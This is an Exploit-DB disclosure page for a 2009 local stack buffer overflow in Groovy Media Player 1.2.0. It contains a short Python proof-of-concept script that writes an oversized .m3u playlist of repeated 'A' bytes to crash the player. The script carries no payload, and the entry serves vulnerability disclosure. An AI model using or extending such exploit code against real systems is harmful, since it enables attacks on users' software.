Lucene search

K
exploitdbOpt!x hackerEDB-ID:9381
HistoryAug 06, 2009 - 12:00 a.m.

Groovy Media Player 1.2.0 - '.m3u' Local Buffer Overflow (PoC)

2009-08-0600:00:00
opt!x hacker
www.exploit-db.com
20

7.4 High

AI Score

Confidence

Low

#!/usr/bin/python
print "Groovy Media Player 1.2.0 (.m3u) local stack overlow POC"
print " finded by : opt!x hacker <[email protected]> "
print "download: http://www.bestwebsharing.com/downloads/groovy-media-player-setup.exe "
junk = "\x41"*213
file=open("crash.m3u","w")
file.write(junk)
file.close()

# milw0rm.com [2009-08-06]

7.4 High

AI Score

Confidence

Low